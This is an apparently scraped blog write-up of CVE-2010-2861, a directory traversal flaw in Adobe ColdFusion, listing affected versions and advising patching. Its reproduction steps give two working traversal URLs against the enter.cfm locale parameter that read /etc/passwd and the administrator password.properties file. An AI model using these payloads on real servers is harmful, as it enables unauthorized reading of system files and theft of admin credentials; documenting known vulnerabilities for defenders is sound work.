当前位置:网站首页>Coldfusion file read holes (CVE - 2010-2861)
Coldfusion file read holes (CVE - 2010-2861)
2022-07-31 01:52:00 【1stPeak】
Disclaimer: All my articles are for technical sharing, please do not use them illegally for other purposes, otherwise you will be responsible for the consequences.
Vulnerability description
CVE-2010-2861
Adobe ColdFusion is a dynamic Web server product of Adobe Corporation of the United States. Its running CFML (ColdFusion Markup Language) is a programming language for Web applications.
A directory traversal vulnerability exists in Adobe ColdFusion 8 and 9 that could allow unauthorized users to read arbitrary files on the server.
Vulnerability impact
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
Vulnerability recurrence
1. Direct access to http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en, you can read the file /etc/passwd
2. Read the background administrator password http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/lib/password.properties%00en
Decrypt password
Bug fixes
Patch, upgrade version
边栏推荐
猜你喜欢
两个有序数组间相加和的Topk问题
MySQL installation tutorial (detailed, package teaching package~)
Kyushu cloud as cloud computing standardization excellent member unit
tcp框架需要解决的问题
Maximum monthly salary of 20K?The average salary is nearly 10,000... What is the experience of working in a Huawei subsidiary?
MySQL stored procedure
汉诺塔问题
multiplayer-hlap 包有问题,无法升级的解决方案
pycharm cannot run after renaming (error: can't open file...No such file or directory)
Shell 脚本循环遍历日志文件中的值进行求和并计算平均值,最大值和最小值
随机推荐
Project development software directory structure specification
曼城推出可检测情绪的智能围巾,把球迷给整迷惑了
leetcode-128:最长连续序列
Charging effect simulation
Multiplication, DFS order
Can an inexperienced college graduate switch to software testing?my real case
Fiddler抓包模拟弱网络环境测试
Overview of prometheus monitoring
力扣每日一题-第46天-704. 二分查找
[Map and Set] LeetCode & Niu Ke exercise
"Cloud native's master, master and vulgar skills" - 2022 National New College Entrance Examination Volume I Composition
软件测试要达到一个什么水平才能找到一份9K的工作?
uniapp使用第三方字体
1.非类型模板参数 2.模板的特化 3.继承讲解
Drools Rule Properties, Advanced Syntax
进程间通信学习笔记
Shell 脚本循环遍历日志文件中的值进行求和并计算平均值,最大值和最小值
Introduction and use of Drools WorkBench
uniapp uses 3rd party fonts
【AcWing 第62场周赛】